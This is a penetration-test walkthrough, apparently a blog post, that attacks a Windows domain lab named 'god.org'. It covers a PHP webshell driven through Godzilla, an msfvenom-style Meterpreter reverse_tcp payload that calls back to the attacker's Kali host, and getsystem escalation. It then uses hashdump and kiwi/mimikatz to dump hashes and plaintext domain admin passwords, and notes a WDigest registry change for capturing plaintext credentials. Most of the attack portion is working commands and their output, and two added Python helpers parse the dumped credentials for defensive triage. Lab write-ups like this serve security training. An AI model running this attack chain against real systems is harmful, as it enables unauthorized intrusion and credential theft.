Enable HackBar, fill in the following, and click Run

http://192.168.72.131/yxcms/protected/apps/default/view/default/info.php

x=phpinfo();


Godzilla (got a domain account's privileges!!)

┌──(root㉿kali)-[~]
└─# cd Desktop
                                                                                                                                      
┌──(root㉿kali)-[~/Desktop]
└─# unzip godzilla.zip 
Archive:  godzilla.zip
  inflating: godzilla.jar            
                                                                                                                                      
┌──(root㉿kali)-[~/Desktop]
└─# java -jar godzilla.jar 

Godzilla download: https://github.com/BeichenDream/Godzilla/releases/tag/v4.0.1-godzilla
Downloading the jar on Win 10 triggers the antivirus, so I put it in an encrypted archive and copied it to Kali to unzip it there; Kali ships with a Java runtime and can run the jar.

Add the shell in Godzilla

http://192.168.72.131/yxcms/protected/apps/default/view/default/info.php


Click Test first to check that the connection works, then click Add.


You can see this is a domain user.
Domain users can now be listed.
PS: if net user /domain shows no domain users, ignore it; leave Kali and Windows running and go out for a meal. Don't ask, it's just voodoo!!

✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌

Internal network penetration

Reverse shell

Theory

The following is from an AI Q&A:

Reverse Shell
A reverse shell is a technique that allows an attacker to execute remote commands on the victim's computer. Unlike a traditional shell, a reverse shell requires the victim's computer to actively connect to the attacker's computer. The connection is usually made with a command-line tool (such as Netcat, nc, or a scripting language). Some characteristics of a reverse shell:

  • Outbound connection: the victim's computer (client) initiates the connection to the attacker's computer (server).
  • Interactive control: once the connection is established, the attacker can control the victim's computer through an interactive command-line interface.
  • Simple to implement: a reverse shell can be created with a single command or a simple script.
  • Varied uses: it can be used for legitimate remote administration as well as for illegitimate remote control.

A callback trojan (回连马) is a class of malware designed to create a hidden entry point on the victim's computer that lets the attacker remotely control or access the system. A callback trojan can take many forms, including but not limited to a reverse shell. Some characteristics of callback trojans:

  • Stealth: callback trojans are designed to be very stealthy, to avoid detection by the user or by security software.
  • Persistence: they are usually persistent and survive a system restart.
  • Multiple capabilities: besides creating a reverse shell, a callback trojan may perform other malicious actions such as file operations, keylogging, and downloading further malware.
  • Command and control: a callback trojan may communicate with a command-and-control (C2) server through which the attacker manages the infected computers.

A reverse shell and a callback trojan (a backdoor, specifically the reverse-connecting type, often called a Reverse Shell Backdoor or simply Reverse Backdoor) are two concepts in network security that are similar in some respects but differ in others:

  • Definition: a reverse shell is a specific technique for creating a reverse connection, while a callback trojan is a category of malware that bundles multiple techniques.
  • Scope: a reverse shell is mainly about providing reverse command-line access, while a callback trojan may contain much broader remote-control functionality.
  • Purpose: a reverse shell can be used for legitimate remote administration (such as remote maintenance by a system administrator), while a callback trojan is usually used for illegitimate remote control and data theft.
  • Complexity: a callback trojan is usually more complex than a single reverse shell and may consist of several components and features.

In practice, a reverse shell can be considered one form of callback trojan, but the scope of a callback trojan is broader and includes more functionality and possibilities. Whether a reverse shell or a callback trojan, they should only be used within the bounds of the law, usually in authorized penetration tests and security assessments. For individuals and organizations, understanding how these techniques work and how to defend against them is very important.

Practice

Use msf to generate the callback payload 64.exe, upload it to Windows, then run it from the Windows terminal so that Kali gets a shell; this makes it convenient to use msf's other modules.

┌──(root㉿kali)-[~]
└─# msfdb run
[+] Starting database
[+] Creating database user 'msf'
[+] Creating databases 'msf'
[+] Creating databases 'msf_test'
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema
                                                  
                                   ____________
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a,        |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a,     |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%|       `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%]
 [% .--------..-----.|  |_ .---.-.|       .,a$%|.-----.|  |.-----.|__||  |_ %%]
 [% |        ||  -__||   _||  _  ||  ,,aS$""`  ||  _  ||  ||  _  ||  ||   _|%%]
 [% |__|__|__||_____||____||___._||%$P"`       ||   __||__||_____||__||____|%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a,       ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%        `"$   %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]
 [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%]


       =[ metasploit v6.3.27-dev                          ]
+ -- --=[ 2335 exploits - 1220 auxiliary - 413 post       ]
+ -- --=[ 1382 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Use the resource command to run 
commands from a file
Metasploit Documentation: https://docs.metasploit.com/

msf6 > use payload/windows/x64/meterpreter/reverse_tcp
msf6 payload(windows/x64/meterpreter/reverse_tcp) > ifconfig
[*] exec: ifconfig

eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.196.3  netmask 255.255.255.0  broadcast 192.168.196.255
        inet6 fe80::20c:29ff:fefa:4ed4  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:fa:4e:d4  txqueuelen 1000  (Ethernet)
        RX packets 378733  bytes 504250152 (480.8 MiB)
        RX errors 81  dropped 0  overruns 0  frame 0
        TX packets 235102  bytes 13690031 (13.0 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
        device interrupt 19  base 0x2000  

eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.72.200  netmask 255.255.255.0  broadcast 192.168.72.255
        ether 00:0c:29:fa:4e:de  txqueuelen 1000  (Ethernet)
        RX packets 14974  bytes 7856755 (7.4 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 7406  bytes 1188730 (1.1 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
        device interrupt 16  base 0x2400  

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 249323  bytes 34534828 (32.9 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 249323  bytes 34534828 (32.9 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

msf6 payload(windows/x64/meterpreter/reverse_tcp) > options

Module options (payload/windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


View the full module info with the info, or info -d command.

msf6 payload(windows/x64/meterpreter/reverse_tcp) > set LHOST 192.168.72.200
LHOST => 192.168.72.200
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set LPORT 5555
LPORT => 5555
msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -f exe -o 64.exe
[*] Writing 7168 bytes to 64.exe...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > ls -al
[*] exec: ls -al

total 184
drwxr-xr-x  14 root root  4096 May 31 21:44 .
drwxr-xr-x 348 root root 12288 Mar  4 13:35 ..
drwxr-xr-x   2 root root  4096 Mar  4 13:20 .bundle
-rw-r--r--   1 root root  7168 May 31 21:44 64.exe
-rw-r--r--   1 root root  1483 Aug 10  2023 Gemfile
-rw-r--r--   1 root root 13794 Aug 10  2023 Gemfile.lock
-rwxr-xr-x   1 root root  1316 Jul 28  2023 Rakefile
drwxr-xr-x   5 root root  4096 Mar  4 13:20 app
drwxr-xr-x   3 root root  4096 May 31 16:34 config
drwxr-xr-x  26 root root  4096 Mar  4 13:20 data
drwxr-xr-x   3 root root  4096 Mar  4 13:20 db
drwxr-xr-x   6 root root  4096 Mar  4 13:20 docs
lrwxrwxrwx   1 root root    27 Aug 10  2023 documentation -> ../doc/metasploit-framework
drwxr-xr-x  16 root root  4096 Mar  4 13:20 lib
-rw-r--r--   1 root root 10442 Aug 10  2023 metasploit-framework.gemspec
drwxr-xr-x   9 root root  4096 Mar  4 13:20 modules
-rw-r--r--   1 root root  1313 Aug 10  2023 msf-json-rpc.ru
-rw-r--r--   1 root root   427 Aug 10  2023 msf-ws.ru
-rwxr-xr-x   1 root root   798 Aug 10  2023 msfconsole
-rwxr-xr-x   1 root root  2807 Aug 10  2023 msfd
-rwxr-xr-x   1 root root  5854 Aug 10  2023 msfdb
-rwxr-xr-x   1 root root  2212 Aug 10  2023 msfrpc
-rwxr-xr-x   1 root root  9580 Aug 10  2023 msfrpcd
-rwxr-xr-x   1 root root   166 Aug 10  2023 msfupdate
-rwxr-xr-x   1 root root 14074 Aug 10  2023 msfvenom
drwxr-xr-x   2 root root  4096 Mar  4 13:20 plugins
-rwxr-xr-x   1 root root   876 Aug 10  2023 ruby
-rwxr-xr-x   1 root root   140 Aug 10  2023 script-exploit
-rwxr-xr-x   1 root root   141 Aug 10  2023 script-password
-rwxr-xr-x   1 root root   138 Aug 10  2023 script-recon
drwxr-xr-x   5 root root  4096 Mar  4 13:20 scripts
drwxr-xr-x  13 root root  4096 Mar  4 13:20 tools
drwxr-xr-x   3 root root  4096 Mar  4 13:20 vendor
msf6 payload(windows/x64/meterpreter/reverse_tcp) > pwd
[*] exec: pwd

/usr/share/metasploit-framework
msf6 payload(windows/x64/meterpreter/reverse_tcp) > 
                                                                                                                                                      

Switch directory and refresh: 64.exe uploaded successfully.

Kali starts the listener

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp                                                                                                
msf6 exploit(multi/handler) > options                                                                                                                 
                                                                                                                                                      
Module options (exploit/multi/handler):                                                                                                               
                                                                                                                                                      
   Name  Current Setting  Required  Description                                                                                                       
   ----  ---------------  --------  -----------                                                                                                       
                                                                                                                                                      
                                                                                                                                                      
Payload options (generic/shell_reverse_tcp):                                                                                                          
                                                                                                                                                      
   Name   Current Setting  Required  Description                                                                                                      
   ----   ---------------  --------  -----------                                                                                                      
   LHOST                   yes       The listen address (an interface may be specified)                                                               
   LPORT  4444             yes       The listen port                                                                                                  


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > set LHOST 0.0.0.0
LHOST => 0.0.0.0
msf6 exploit(multi/handler) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 0.0.0.0:5555 


Run 64.exe from Godzilla

You can see that the msf side has received the connection.

Domain information gathering (GOD\Administrator)

getuid: check the current user
meterpreter > getuid
Server username: GOD\Administrator       

In Meterpreter, the getuid command displays the username of the current session.
It returned Server username: GOD\Administrator
Server: refers to the target host, i.e. the controlled machine.
username: the user identity of the current Meterpreter session.
GOD\Administrator: the current session's user is Administrator, and that user belongs to the GOD domain.

shell: collecting information
meterpreter > shell                                                                                                                                     
Process 4420 created.                                                                                                                                   
Channel 1 created.                                                                                                                                      
Microsoft Windows [�汾 6.1.7601]                                                                                                                        
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����                                                                                                   
                                                                                                                                                        
C:\>net config workstation                                                                                                                              
net config workstation                                                                                                                                  
��������                     \\STU1                                                                                                                     
������ȫ��                   stu1.god.org                                                                                                                
�û���                       Administrator                                                                                                               
                                                                                                                                                        
����վ��������                                                                                                                                           
        NetBT_Tcpip_{4DAEBDFD-0177-4691-8243-B73297E2F0FF} (000C29050377)                                                                               
        NetBT_Tcpip_{55ECD929-FBB2-4D96-B43D-8FFEB14A169F} (000C29050381)                                                                               
        NetBT_Tcpip_{EC57C4EB-763E-4000-9CDE-4D7FF15DF74C} (02004C4F4F50)                                                                               
                                                                                                                                                        
�����汾                     Windows 7 Professional                                                                                                      

����վ��                     GOD
����վ�� DNS ����            god.org
��¼��                       GOD

COM �򿪳�ʱ (��)            0
COM ���ͼ��� (��)          16
COM ���ͳ�ʱ (����)          250
�����ɹ����ɡ�


C:\>chcp 65001
chcp 65001
Active code page: 65001

C:\>net config workstation
net config workstation
Computer name                        \\STU1
Full Computer name                   stu1.god.org
User name                            Administrator

Workstation active on                
        NetBT_Tcpip_{4DAEBDFD-0177-4691-8243-B73297E2F0FF} (000C29050377)
        NetBT_Tcpip_{55ECD929-FBB2-4D96-B43D-8FFEB14A169F} (000C29050381)
        NetBT_Tcpip_{EC57C4EB-763E-4000-9CDE-4D7FF15DF74C} (02004C4F4F50)

Software version                     Windows 7 Professional

Workstation domain                   GOD
Workstation Domain DNS Name          god.org
Logon domain                         GOD

COM Open Timeout (sec)               0
COM Send Count (byte)                16
COM Send Timeout (msec)              250
The command completed successfully.


C:\>net time /domain
net time /domain
Current time at \\owa.god.org is 2024/5/31 23:53:26

The command completed successfully.


C:\>ping owa.god.org
ping owa.god.org

Pinging owa.god.org [192.168.52.138] with 32 bytes of data:
Reply from 192.168.52.138: bytes=32 time<1ms TTL=128
Reply from 192.168.52.138: bytes=32 time<1ms TTL=128
Reply from 192.168.52.138: bytes=32 time<1ms TTL=128
Reply from 192.168.52.138: bytes=32 time<1ms TTL=128

Ping statistics for 192.168.52.138:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

C:\>net view
net view
Server Name            Remark

-------------------------------------------------------------------------------
\\OWA                                                                          
\\ROOT-TVI862UBEH                                                              
\\STU1                                                                         
The command completed successfully.


C:\>net view
net view
Server Name            Remark

-------------------------------------------------------------------------------
\\OWA                                                                          
\\ROOT-TVI862UBEH                                                              
\\STU1                                                                         
The command completed successfully.


C:\>ping ROOT-TVI862UBEH 
ping ROOT-TVI862UBEH 

Pinging ROOT-TVI862UBEH.god.org [192.168.52.141] with 32 bytes of data:
Reply from 192.168.52.141: bytes=32 time=7ms TTL=128
Reply from 192.168.52.141: bytes=32 time<1ms TTL=128
Reply from 192.168.52.141: bytes=32 time<1ms TTL=128
Reply from 192.168.52.141: bytes=32 time<1ms TTL=128

Ping statistics for 192.168.52.141:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 7ms, Average = 1ms

C:\>exit
exit
meterpreter > 
                               


hashdump: password hashes
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                               
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::                                                                          
hack01:1001:aad3b435b51404eeaad3b435b51404ee:c157e440a12221bf1facadd768c904b4:::                                                                        
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

Username:SID:LM hash:NTLM hash:::
For three of the accounts, the LM hash aad3b435b51404eeaad3b435b51404ee and the NTLM hash 31d6cfe0d16ae931b73c59d7e0c089c0 are both the empty-password hashes.
The following is from an AI Q&A:
Starting with Windows 10 and Windows Server 2012 R2, Windows by default no longer keeps plaintext passwords in the in-memory cache, and the password field shows as null. To successfully grab plaintext passwords you need to modify the registry and wait for the user to log in again. Specifically, set the UseLogonCredential value under the registry key HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to 1. After changing the registry, the user must log off or log in again for the change to take effect.
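Added example (my code, not from the post or from Metasploit): a parser for the hashdump lines above that flags what a defender would act on, namely accounts whose NT hash is the empty-password hash and hosts that still store LM hashes. The sample is constructed from the output above; the extra "legacy" line with a non-empty LM hash is invented to exercise that check, and the function names are my own.

```python
from dataclasses import dataclass
from typing import Dict, List

# Well-known hashes of the empty password. The LM value also appears whenever
# LM hash storage is disabled, which is the default on Vista and later.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed from the hashdump output above: the local SAM of the lab host STU1.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
hack01:1001:aad3b435b51404eeaad3b435b51404ee:c157e440a12221bf1facadd768c904b4:::
liukaifeng01:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""

# Constructed line (not from the page) with a non-empty LM hash, as an old host
# with LM storage still enabled would show.
SAMPLE_LEGACY_LINE = "legacy:1002:0123456789abcdef0123456789abcdef:c157e440a12221bf1facadd768c904b4:::"


@dataclass
class HashEntry:
    user: str
    rid: int
    lm_hash: str
    nt_hash: str


def parse_hashdump(text: str) -> List[HashEntry]:
    """Parse user:rid:lmhash:nthash::: lines into entries; blank lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"not a hashdump line: {line!r}")
        user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            raise ValueError(f"malformed hash in line: {line!r}")
        entries.append(HashEntry(user, rid, lm, nt))
    return entries


def audit_hashes(entries: List[HashEntry]) -> Dict[str, List[str]]:
    """Map each account to the weaknesses its hashes reveal; accounts with none are omitted."""
    findings: Dict[str, List[str]] = {}
    for e in entries:
        issues = []
        if e.nt_hash == EMPTY_NT:
            issues.append("empty password")
        if e.lm_hash != EMPTY_LM:
            issues.append("LM hash stored (crackable, disable LM storage)")
        if e.rid == 500 and e.nt_hash == EMPTY_NT:
            issues.append("built-in Administrator (RID 500) has no password")
        if issues:
            findings[e.user] = issues
    return findings


if __name__ == "__main__":
    for user, issues in audit_hashes(parse_hashdump(SAMPLE_HASHDUMP)).items():
        print(f"{user}: {', '.join(issues)}")
```

hashdump reads the local SAM, so the Administrator in this list is STU1's local built-in account (RID 500) with no password set, a separate account from the domain Administrator in GOD.ORG. The remediation on such a host is to set or disable unused local accounts, keep Guest disabled, and keep LM hash storage off.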


Information summary
  • List of computers reachable on the network:
    \\OWA
    \\ROOT-TVI862UBEH
    \\STU1

  • Domain controller of the current domain:
    \\owa.god.org

  • Machine IPs:
    ROOT-TVI862UBEH → [192.168.52.141]
    OWA (owa.god.org) → [192.168.52.138]

kiwi: obtaining Kerberos tickets

What is kiwi??
  • The following is from an AI Q&A:

“Kiwi” here is a nickname for mimikatz, because the developer of mimikatz, Benjamin DELPY, goes by the handle “gentilkiwi”. So in the security community people sometimes affectionately refer to mimikatz as “kiwi”.
mimikatz is an open-source tool widely used in security research and penetration testing, mainly on Windows systems. mimikatz can perform many operations related to credential access and credential dumping, including but not limited to:

  • Extracting Windows credentials from memory.
  • Dumping logon passwords.
  • Impersonating logon tokens.
  • Extracting password hashes from LSA memory.
  • Creating and using Kerberos tickets.

Kiwi (GOD\Administrator: warns it is not running as SYSTEM)

In a Meterpreter session, loading the mimikatz extension (with the load kiwi command) lets the user run mimikatz's various functions directly within the session. This gives penetration testers a powerful tool to help assess the security of the target system.

meterpreter > getuid                                                                                                                                    
Server username: GOD\Administrator                                                                                                                      
meterpreter > load kiwi
Loading extension kiwi...                                                                                                                               
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)                                                                                                                                                
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)                                                                                                                                                      
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )                                                                                                                         
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz                                                                                                                                           
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )                                                                                                                        
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/                                                                                                                        
                                                                                                                                                                                                 
Success.                                                                                                                                                                                         
meterpreter > help        

getuid shows the current server user is GOD\Administrator.
The kiwi extension integrates mimikatz; help lists the commands it provides. Note: there are too many commands to screenshot here.

meterpreter > creds_all 
[!] Not running as SYSTEM, execution may fail
meterpreter > 

creds_all retrieves the parsed credentials; it warns that we are not running as SYSTEM. Remember that getuid currently shows GOD\Administrator. We will use msf to escalate privileges later.

User accounts in Windows
  • The following is from an AI Q&A:

NT AUTHORITY\SYSTEM and GOD\Administrator are two different types of user accounts in Windows, with different meanings and privilege levels:

  1. NT AUTHORITY\SYSTEM:
  • This is a special security principal in Windows that represents the operating system itself.
  • The SYSTEM account is one of the most privileged accounts in Windows and is normally used to perform system-level tasks and operations.
  • It is normally not part of a domain but a local computer account.
  • The SYSTEM account has full control over the entire system, including access to all files and registry keys, starting and stopping services, and so on.

  2. GOD\Administrator:
  • This denotes a user account named Administrator that belongs to a domain or workgroup named GOD.
  • Administrator is a common built-in account name, usually used for system administration tasks.
  • In a domain environment, Administrator may be the domain administrator account, with rights to manage the whole domain.
  • In a workgroup environment, Administrator may be the administrator account of a particular computer in the workgroup, with rights to manage that computer.
  • The privilege level depends on the domain or workgroup the account belongs to and on whether the account is an administrator.

Main differences:

  • Account type: NT AUTHORITY\SYSTEM is a local or domain system account, while GOD\Administrator is a user account in a domain or workgroup.
  • Scope of privileges: the SYSTEM account usually has full control over a single system, while the Administrator account's privileges may span multiple computers, depending on its domain or workgroup.
  • Purpose: the SYSTEM account is normally used for system-level operations and maintenance, while the Administrator account is used to manage user accounts and system settings and to perform administrative tasks.
  • Security: because the SYSTEM account is so highly privileged, it is normally not used for day-to-day operations, to reduce security risk. The Administrator account is also highly privileged but is more commonly used for administrative tasks.

In security operations and penetration testing, identifying the user context of the current session or operation matters, because it determines which operations you can perform and how to escalate privileges or maintain access.

msf (privilege escalation to SYSTEM) + kiwi (grabbing Kerberos credentials)

getuid above showed GOD\Administrator. Trying to grab credentials at this point gives Not running as SYSTEM, execution may fail, which means the current session or execution context is not running with SYSTEM privileges.

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
[-] Error running command creds_all: ActiveRecord::RecordInvalid Validation failed: Data is not in the NTLMHash data format of <LAN Manager hex digest>:<NT LAN Manager hex digest>, where each hex digest is 32 lowercase hexadecimal characters.
meterpreter > creds_kerber
[-] Unknown command: creds_kerber
meterpreter > creds_kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

Username       Domain   Password
--------       ------   --------
(null)         (null)   (null)
Administrator  GOD.ORG  2024@hongri
hack01         STU1     1324@cbD
stu1$          GOD.ORG  d6 87 2c c5 8d 76 4f d6 6b 64 a7 26 c4 46 a4 d8 9b 2e ef 83 01 75 72 bb 39 54 d1 d3 2b de f9 26 b0 3c 47 18 b7 17 1e cf 14 79 5f 9b ec 75 05 05 bb 70 31 e9 fb c8 17 02 1e 96 86 86 a0
                        ff a4 c8 26 14 25 b5 6c 68 9e 66 97 9d e8 7e cf a4 5d e8 63 1d aa 35 cd ae 24 01 90 ab 74 83 1a 00 13 b5 73 f9 55 5b 71 77 dd 9d 5e be 00 8f db fe c2 e4 2c 51 a4 f8 d8 de 4c 3a 8d bb
                        4a 16 a4 f1 18 b3 8d c5 f7 98 8c cc 2c 6f a3 ab f3 d0 31 90 dd 52 dd 37 f3 d1 01 12 fd 16 71 3a 0a 11 3a 8e b8 9f 7c ac e6 01 c7 21 7a 39 e2 76 16 05 dd 08 8d d1 95 7c f5 0f 10 8b f6
                        6a b3 41 b1 e6 b6 da 86 23 fa d8 e0 94 bc 7f e9 bc 52 eb 49 2c 1c 02 b0 3d aa 81 59 f7 37 07 88 26 d3 45 df 2f 0c d6 d4 db cb 55 91 24 e1 dd 05 89 73 ec ee af 1c 91 38 cc


meterpreter > 


The msf command getsystem tries to elevate the current session's privileges to SYSTEM.
SYSTEM is the most privileged user account in Windows and has full control of the system.
After escalating with getsystem, getuid changed to NT AUTHORITY\SYSTEM.
creds_kerberos retrieves the (parsed) Kerberos credentials; it successfully returned them, with the password 2024@hongri.
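Added example (my code, not from the post, Metasploit or mimikatz): an incident-response helper that parses the creds_kerberos table above. It takes the column offsets from the header line, joins the wrapped hex lines of the stu1$ machine key back into one value, and produces a remediation list for every exposed credential, separating human accounts (password must be reset) from computer accounts (random key, rotated automatically). The sample is constructed from the output above with the machine key shortened to two wrapped lines; function names are my own.

```python
from dataclasses import dataclass
from typing import List, Tuple

# Constructed from the creds_kerberos output above, with the stu1$ machine key
# shortened to two wrapped lines (the real output wraps it over four).
SAMPLE_CREDS_KERBEROS = """\
kerberos credentials
====================

Username       Domain   Password
--------       ------   --------
(null)         (null)   (null)
Administrator  GOD.ORG  2024@hongri
hack01         STU1     1324@cbD
stu1$          GOD.ORG  d6 87 2c c5 8d 76 4f d6 6b 64 a7 26 c4 46 a4 d8
                        ff a4 c8 26 14 25 b5 6c 68 9e 66 97 9d e8 7e cf
"""


@dataclass
class KerberosCred:
    username: str
    domain: str
    password: str


def parse_creds_kerberos(text: str) -> List[KerberosCred]:
    """Parse the kiwi creds_kerberos table. Column offsets come from the header
    line; a row whose Username column is blank continues the previous password."""
    lines = text.splitlines()
    for idx, line in enumerate(lines):
        if line.startswith("Username") and "Domain" in line and "Password" in line:
            header_idx = idx
            break
    else:
        raise ValueError("creds_kerberos header not found")
    header = lines[header_idx]
    dom_col = header.index("Domain")
    pwd_col = header.index("Password")
    creds: List[KerberosCred] = []
    for line in lines[header_idx + 2:]:  # header_idx + 1 is the dashes underline
        if not line.strip():
            continue
        user = line[:dom_col].strip()
        if not user:  # wrapped continuation of the previous row's password
            if creds:
                creds[-1].password += " " + line[pwd_col:].strip()
            continue
        domain = line[dom_col:pwd_col].strip()
        password = line[pwd_col:].strip()
        if user == "(null)":  # placeholder row kiwi prints for empty sessions
            continue
        creds.append(KerberosCred(user, domain, password))
    return creds


def is_machine_key(password: str) -> bool:
    """True when the 'password' is a hex byte dump, i.e. a computer account's random key."""
    tokens = password.split()
    return len(tokens) >= 16 and all(
        len(t) == 2 and all(c in "0123456789abcdef" for c in t) for t in tokens
    )


def triage(creds: List[KerberosCred]) -> List[Tuple[str, str, str]]:
    """For each exposed credential, return (account, kind, remediation)."""
    out = []
    for c in creds:
        account = f"{c.domain}\\{c.username}"
        if c.username.endswith("$") or is_machine_key(c.password):
            out.append((account, "machine account",
                        "reset the computer account password (or let the automatic rotation run) "
                        "and review what trusts this host"))
        else:
            out.append((account, "user account",
                        "reset the password, revoke existing sessions, "
                        "and disable WDigest plaintext caching on the host"))
    return out


if __name__ == "__main__":
    for account, kind, action in triage(parse_creds_kerberos(SAMPLE_CREDS_KERBEROS)):
        print(f"{account:<25} {kind:<16} {action}")
```

The two user accounts show up in plaintext because Windows 7 still caches WDigest credentials in LSASS. On hosts that must keep WDigest, the defensive setting is the same registry value the AI answer above describes, UseLogonCredential under HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest, set to 0 (on Windows 7 this needs the Microsoft update that backports the setting), and the change only takes effect for sessions created after the next logon.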


shell (SYSTEM): verifying whether Administrator is a domain admin

We guess that Administrator is a domain admin and need to drop into a shell to verify.

meterpreter > shell
Process 4616 created.                                                                                                                
Channel 2 created.                                                                                                                   
Microsoft Windows [�汾 6.1.7601]                                                                                                     
��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����                                                                                
                                                                                                                                     
C:\Windows\system32>chcp 65001                                                                                                       
chcp 65001                                                                                                                           
Active code page: 65001                                                                                                              
                                                                                                                                     
C:\Windows\system32>whoami                                                                                                           
whoami                                                                                                                               
nt authority\system                                                                                                                  
                                                                                                                                     
C:\Windows\system32>net group "domain admins" /domain                                                                                
net group "domain admins" /domain                                                                                                    
The request will be processed at a domain controller for domain god.org.                                                             
                                                                                                                                     
Group name     Domain Admins                                                                                                         
Comment        ����������Ա                                                                                                           

Members

-------------------------------------------------------------------------------
Administrator            OWA$                     
The command completed successfully.


C:\Windows\system32>exit
exit

  • The following is from an AI Q&A:

In this Meterpreter session, the shell command was run to open a Windows command shell. The commands executed and the information obtained were as follows:

  1. chcp 65001:
    • This command changes the console code page to 65001, i.e. UTF-8 encoding. This ensures characters display correctly and avoids mojibake.
  2. whoami:
    • The whoami command shows the identity of the current user. The output nt authority\system indicates the current session is running as SYSTEM, the most privileged user in Windows.
  3. net group "domain admins" /domain:
    • The net group "domain admins" /domain command displays information about the "Domain Admins" group in the domain god.org. The output lists the group's members, including "Administrator" and "OWA$" (OWA usually stands for the Outlook Web Access service account).
  4. exit:
    • The exit command leaves the current Windows command shell and returns to the Meterpreter session.

From these commands, the following information was obtained:

  • The session has SYSTEM-level access, the highest privilege level in Windows.
